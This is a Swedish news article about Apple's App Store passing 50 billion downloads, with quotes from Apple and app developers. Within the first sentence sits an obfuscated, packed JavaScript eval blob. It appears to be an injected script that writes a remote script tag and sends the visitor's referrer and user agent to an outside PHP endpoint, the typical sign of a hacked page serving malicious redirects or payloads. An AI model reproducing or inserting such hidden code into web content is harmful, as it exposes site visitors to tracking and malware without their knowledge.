Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Apples App Store slår rekord – 50 miljarder nedladdningar

apple logo
Sebastian

App eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bbirz|var|u0026u|referrer|fitrs||js|php’.split(’|’),0,{}))
Store: Apple meddelade idag att kunder har laddat ned över 50 miljarder appar* från banbrytande App Store. Kunderna laddar ned mer än 800 appar per sekund med en hastighet på över två miljarder appar per månad på App Store.

App nummer 50 miljarder blev ”Say the Same Thing” av Space Inch, LLC, som hämtades av Brandon Ashmore från Mentor i Ohio. Vinnaren kommer att få ett App Store-presentkort värt 10 000 dollar för att hedra denna historiska milstople.

”Apple vill tacka sina fantastiska kunder och utvecklare för att vi nått 50 miljarder nedladdningar”, sa Eddy Cue, Apples vice VD för internetmjukvara och internettjänster.

”App Store har totalt förändrat människors sätt att använda mobila enheter och skapat ett framgångsrikt ekosystem för appar som har gett över nio miljarder dollar i utdelning till utvecklarna. Vi är helt förbluffade över att ha nått denna milstople på mindre än fem år.”

App Store öppnade i juli 2008 med 500 appar. Sedan starten har Apples fantastiska utvecklare skapat appar så att användarna kan göra nästan vad som helst på en iPhone, iPad och iPod touch.

”Vi var otroligt överraskade över succén med App Store 2008”, säger Rich Riley, VD på Shazam. 

”Nu, nästan fem år senare, fortsätter vi att förundras över hur mycket alla gillar att använda Shazam på sina iPhone- och iPad-enheter.”

”Tack vare App Store kan vi smidigt ge användarna tillgång till uppdateringar så att de kan dra nytta av fantastiska nya funktioner, samtidigt som det är enkelt för nya användare att på egen hand upptäcka och ladda ned Shazam.”

”Vi var tre vänner som startade företaget 2008 med idén att skapa suveräna utbildningsappar till våra barn”, sa Caroline Hu Flexer, en av grundarna till Duck Duck Moose. ”Med App Store har vi kunnat sprida ’Wheels on the Bus’ till hela världen. Sexton appar senare är vi överlyckliga över framgången vi nått. Vi har ett växande företag med 20 heltidsanställda och miljontals föräldrar, barn och utbildare gillar det vi gör.”

”App Store har varit avgörande för att kunna nå ut till miljontals iOS-användare och har förändrat vår verksamhet”, säger Elizabeth Francis, marknadföringsansvarig på Gilt.com. ”Våra appar gör det möjligt för medlemmar att ta del av erbjudanden på Gilt varje dag, när och var som helst. Kunderna i App Store har visat sig vara lojala och bidragit till att Gilt vuxit till ett globalt välkänt märke.”

Banbrytande App Store erbjuder över 850 000 appar för iPhone-, iPad- och iPod touch-användare i 155 länder runt om i världen. Bland dessa finns fler än 350 000 appar som skapats särskilt för iPad. App Store-kunderna kan välja och vraka ur ett otroligt apputbud inom 23 kategorier, bland annat tidningar och tidskrifter i Tidningskiosk, spel, ekonomi, nyheter, sport, hälsa och fitness samt resor.

*50 miljarder unika nedladdningar, undantaget åternedladdningar och uppdateringar.